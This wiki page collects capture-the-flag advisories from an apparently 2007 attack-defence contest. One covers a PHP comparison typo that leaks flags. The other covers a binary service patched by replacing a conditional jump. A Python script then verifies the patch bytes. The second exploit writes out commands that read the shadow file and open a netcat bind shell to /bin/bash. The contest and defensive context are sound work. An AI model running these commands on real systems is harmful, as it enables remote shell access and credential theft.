Advisories

From Labor für Echtzeitsysteme

  • Advisories should be read and followed regularly!
  • Advisories should be written? Possibly prepare a web form for this?

Structure of advisories


Display Advisory


Advisory from 0x28 Pros on Service time Submitted at 19:21 12.07.2007 Score by rosebud with 2 scores.

Comment: "ok"


Advisory: There is a vulnerability in this service that reveals flags.


Exploit: Entering any start and stop time reveals a flag.


Patch:

Nice typo! Line 196 under work_functions.php should be
if ($userid==1) *not* 
if ($userid=1)


Display Advisory


Advisory from Hackerdom on Service rev Submitted at 20:02 12.07.2007 Score by Lexi with 4 scores.

Comment: "Excellent, why didn't you write it this way earlier? Finally we're getting somewhere"


Advisory:

problem description: at the place where the check for "exec" string is done, if it doesn't succeed it tries ls, etc... if it succeeds it tries help, etc. after patch the jump will be done to the place, where not "exec", not "ls", not etc... would go so you have to use some editor to change the logic of reveng


Exploit:

after doing the ssl connection you can do the following:

exec help
ls
cat shadow

or by numbers doing exec...

uname -a
netstat -tapn
uptime
last
nohup /usr/bin/nc -l -r -e /bin/bash &
stty -a
ps fax

Patch: change

8049a23   0f853d010000                     jnz         loc_8049b66                                                                  

to

8049a23   e970010000                       jmp         loc_8049b98                                                                                                          
8049a28   90                               nop                           
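
An added example, not part of the advisory or the original page: a Python check that the patch bytes in the listing above encode the stated jump targets and that the replacement fills the same six bytes as the original instruction. Addresses and bytes are copied from the listing; the function names are hypothetical.

```python
import struct

NOP = b"\x90"

def decode_rel32_branch(addr, code):
    """Decode a near jmp (E9) or jcc (0F 80..8F) with a 32-bit displacement.

    Returns (mnemonic, instruction_length, target_address)."""
    if code[:1] == b"\xe9":
        opcode_len, name = 1, "jmp"
    elif len(code) >= 2 and code[0] == 0x0F and 0x80 <= code[1] <= 0x8F:
        opcode_len = 2
        name = "jnz" if code[1] == 0x85 else "jcc"
    else:
        raise ValueError("not a rel32 branch")
    length = opcode_len + 4
    if len(code) < length:
        raise ValueError("truncated instruction")
    (disp,) = struct.unpack_from("<i", code, opcode_len)
    # The displacement is relative to the address of the next instruction.
    return name, length, (addr + length + disp) & 0xFFFFFFFF

def make_jmp_patch(addr, old_len, target):
    """Encode `jmp target` at addr and pad with NOPs to old_len bytes."""
    patch = b"\xe9" + struct.pack("<i", target - (addr + 5))
    if old_len < len(patch):
        raise ValueError("original instruction too short for jmp rel32")
    return patch + NOP * (old_len - len(patch))

# Values copied from the listing in the advisory.
ADDR = 0x8049A23
ORIGINAL = bytes.fromhex("0f853d010000")     # jnz loc_8049b66
PATCHED = bytes.fromhex("e970010000") + NOP  # jmp loc_8049b98 ; nop

def check_advisory_patch():
    """Return True if the patch is same-size and hits the stated targets."""
    name, old_len, old_target = decode_rel32_branch(ADDR, ORIGINAL)
    rebuilt = make_jmp_patch(ADDR, old_len, 0x8049B98)
    _, _, new_target = decode_rel32_branch(ADDR, rebuilt)
    return (name == "jnz" and old_target == 0x8049B66
            and rebuilt == PATCHED and new_target == 0x8049B98)

if __name__ == "__main__":
    print("patch consistent:", check_advisory_patch())
```

The NOP matters because the unconditional jump is one byte shorter than the conditional one; without it the leftover byte at 8049a28 would remain as a stray byte in the instruction stream.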
